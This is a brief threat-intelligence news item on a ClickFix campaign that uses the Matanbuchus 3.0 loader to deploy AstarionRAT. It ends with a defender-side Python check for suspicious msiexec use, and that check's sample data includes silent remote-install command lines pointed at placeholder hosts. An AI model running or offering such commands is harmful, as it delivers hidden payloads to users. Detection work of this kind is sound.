Malicious actors have leveraged the Matanbuchus 3.0 malware-as-a-service loader to deploy the novel AstarionRAT payload in an attack campaign that involved ClickFix techniques, according to GBHackers News.

Intrusions commenced with a prompt tricking targets into copying and pasting into the local console a command that abuses msiexec.exe to install a remote MSI package with no visible UI, a report from the Huntress Tactical Response team and SOC showed. Running the MSI delivers several files, including Zillya antivirus components and a DLL serving as the Matanbuchus 3.0 loader.

Matanbuchus 3.0 stores its sensitive strings in a ChaCha20-encrypted blob alongside its core shellcode, and the loader enumerates antivirus and endpoint detection and response processes before eventually deploying AstarionRAT. AstarionRAT supports two dozen commands covering file management, credential-backed logon, process control, scanning, SOCKS5 tunneling, and in-memory reflective payload execution, said researchers.
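A defender-side triage check for the msiexec pattern described above, added here as an example and not part of the Huntress or GBHackers reporting: it classifies process-creation command lines by whether msiexec is pointed at a remote (http/https) package with its UI suppressed. The command lines are constructed samples, and the verdict labels are my own.

```python
import re

# msiexec switches that suppress the installer UI entirely (documented switches).
NO_UI_FLAGS = {"q", "qn", "quiet"}

# Constructed sample process-creation command lines (not taken from the report).
SAMPLE_COMMAND_LINES = [
    r'msiexec.exe /i https://example.invalid/update.msi /qn',
    r'"C:\Windows\System32\msiexec.exe" /package http://example.invalid/a.msi /quiet /norestart',
    r'msiexec /i "C:\Users\user\Downloads\setup.msi" /qn',
    r'MSIEXEC.EXE -I HTTPS://EXAMPLE.INVALID/x.msi -Q',
    r'msiexec.exe /i https://example.invalid/x.msi',
    r'notepad.exe C:\notes.txt',
]


def tokenize(cmdline: str) -> list[str]:
    """Split a Windows command line on whitespace, keeping quoted paths whole."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]


def classify_msiexec(cmdline: str) -> str:
    """Return a verdict label for one command line.

    'remote-silent-install' is the ClickFix-style shape: msiexec fetching an
    MSI over http(s) with the UI hidden, so the user sees nothing after pasting.
    """
    tokens = tokenize(cmdline)
    if not tokens:
        return "not-msiexec"
    image = tokens[0].rsplit("\\", 1)[-1].lower()
    if image not in ("msiexec", "msiexec.exe"):
        return "not-msiexec"
    args = tokens[1:]
    # Switches may use '/' or '-' and are case-insensitive.
    switches = {a.lower().lstrip("/-") for a in args if a[:1] in ("/", "-")}
    remote = any(re.match(r"https?://", a, re.IGNORECASE) for a in args)
    if remote and switches & NO_UI_FLAGS:
        return "remote-silent-install"
    if remote:
        return "remote-install"
    if switches & NO_UI_FLAGS:
        return "local-silent-install"
    return "msiexec-other"


def find_clickfix_candidates(cmdlines: list[str]) -> list[str]:
    """Filter a batch of command lines down to the highest-priority verdict."""
    return [c for c in cmdlines if classify_msiexec(c) == "remote-silent-install"]
```

Feed it the CommandLine field from process-creation telemetry; a remote-silent-install verdict from a user-launched console is worth a look even when the MSI itself is not yet known-bad.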